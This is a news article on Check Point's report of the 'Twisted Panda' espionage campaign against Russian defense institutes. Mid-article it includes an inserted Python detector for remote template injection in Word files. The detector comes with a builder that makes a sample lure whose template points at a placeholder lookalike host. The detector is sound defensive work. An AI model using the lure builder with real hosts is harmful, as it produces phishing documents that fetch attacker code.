
Despite diplomatic proximity, Chinese hackers attack Russia

Cybersecurity firm Check Point Research has detected a cyber-espionage operation targeting Russian defense research institutes. Attributed to Chinese state-sponsored hackers, the operation uses social engineering to steal confidential information, with lures built around Western sanctions against the Russian government.

According to Check Point, the attackers avoided detection for nearly 11 months using previously unseen tools: a sophisticated multi-layer loader and a backdoor the researchers named Spinner. Check Point calls the campaign "Twisted Panda", reflecting both the sophistication of the tools observed and their attribution to China.

Three defense research targets were identified: two in Russia and one in Belarus. According to Check Point, the Russian victims belong to Rostec, the state defense holding company and currently the country's largest radio-electronics conglomerate. Their main business is the development and manufacture of electronic warfare systems, specialized military radio-electronic equipment, air-based radar stations and means of state identification (friend-or-foe identification).

The attackers send their targets a spear-phishing email carrying a document that uses Western sanctions against Russia as the lure. When the victim opens the document, it fetches malicious code from an attacker-controlled server, which silently installs and runs a backdoor on the victim's machine. The backdoor collects information about the infected host and sends it back to the operators, who, according to Check Point, have been conducting espionage against Russian targets for 11 months.

Documents imitated the emblem of the Russian Ministry of Health

The operation relies on spear-phishing emails built on social engineering. On March 23, 2022, emails were sent to defense research institutes in Russia with the subject line "List of people subject to US sanctions for invading Ukraine", carrying an attachment that pulls its malicious content from an attacker-controlled site imitating the Russian Ministry of Health. On the same day, a similar email went to an unknown entity in Minsk, Belarus, with the subject "Spread of deadly pathogens in Belarus by the US".

All the attached documents are designed to look like official Russian Ministry of Health documents, with the official emblem and title.
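An added example, not from the page or from Check Point's report: the article does not say how the attached documents pull their payload from the attacker's server, but the usual mechanism for a Word lure that downloads content on open is an external attachedTemplate relationship (remote template injection). The script below, written for this page, unpacks a .docx in memory, lists every relationship marked TargetMode="External", and flags the ones that make Word contact a remote host when the file is opened. The lure .docx it inspects is constructed inline; the domain minzdrav-lookalike.invalid is a placeholder, not an indicator from the campaign.

```python
"""Flag Office Open XML documents that fetch content from a remote host on open."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship types Word resolves automatically when the document is opened.
# attachedTemplate pointing at a remote target is the remote-template-injection case.
FETCHING_REL_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}


def is_remote(target):
    """True for http/https/ftp/file URLs and UNC paths (\\\\host\\share)."""
    if target.startswith("\\\\"):
        return True
    return urlparse(target).scheme.lower() in {"http", "https", "ftp", "file"}


def external_relationships(docx_bytes):
    """Yield (rels_part, rel_type, target) for every TargetMode="External" relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    yield part, rel_type, rel.get("Target", "")


def assess(docx_bytes):
    """Return findings as (severity, description, target, rels_part) tuples."""
    findings = []
    for part, rel_type, target in external_relationships(docx_bytes):
        if not is_remote(target):
            continue  # relative or local target: not a network fetch
        if rel_type == "attachedTemplate":
            findings.append(("high", "remote template fetched on open", target, part))
        elif rel_type in FETCHING_REL_TYPES:
            findings.append(("medium", f"external {rel_type} loaded on open", target, part))
        # hyperlinks are external too, but need a click; not reported here
    return findings


def build_sample_docx(template_url=None):
    """Constructed minimal .docx (sample for this example, not a real lure).

    When template_url is given, word/_rels/settings.xml.rels points the
    document's attached template at it, exactly as a remote-template lure would.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels",
                    f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
                    f'<Relationship Id="rId1" Type="{OFFICE_REL}/officeDocument" '
                    'Target="word/document.xml"/></Relationships>')
        zf.writestr("word/document.xml",
                    f'<w:document xmlns:w="{WORD_NS}"><w:body><w:p><w:r>'
                    '<w:t>List of persons subject to sanctions</w:t>'
                    '</w:r></w:p></w:body></w:document>')
        zf.writestr("word/settings.xml",
                    f'<w:settings xmlns:w="{WORD_NS}" xmlns:r="{OFFICE_REL}">'
                    '<w:attachedTemplate r:id="rId1"/></w:settings>')
        if template_url:
            zf.writestr("word/_rels/settings.xml.rels",
                        f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
                        f'<Relationship Id="rId1" Type="{OFFICE_REL}/attachedTemplate" '
                        f'Target="{template_url}" TargetMode="External"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder lookalike domain; not an indicator from the campaign.
    lure = build_sample_docx("http://minzdrav-lookalike.invalid/template.dotm")
    for finding in assess(lure):
        print(*finding)
    print("benign findings:", assess(build_sample_docx()))
```

Run against a real mailbox quarantine, the same loop over every `.rels` part also catches external OLE objects and frames; a clean document normally has no `TargetMode="External"` relationship at all outside of hyperlinks, so any remote template target is worth blocking at the gateway regardless of how convincing the lure body looks.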

The TTPs (tactics, techniques and procedures) used in the operation allowed Check Point to attribute it to a Chinese APT (advanced persistent threat) actor. According to the company, "Twisted Panda" overlaps with long-standing and advanced Chinese cyber-espionage groups, including APT10 and Mustang Panda.

Itay Cohen, head of research at Check Point, says the most sophisticated part of the campaign is the social engineering: the timing of the attacks and the lures used are "smart", and from a technical point of view the quality of the tools is above average, even for APT groups.

“It is further evidence that espionage is a systematic, long-term effort in the service of China’s strategic goals to achieve technological superiority,” he said. “We’ve seen how state-sponsored Chinese attackers are taking advantage of the ongoing war between Russia and Ukraine, unleashing advanced tools against what is considered a strategic partner: Russia.”

Main image credit: Mehaniq/Shutterstock
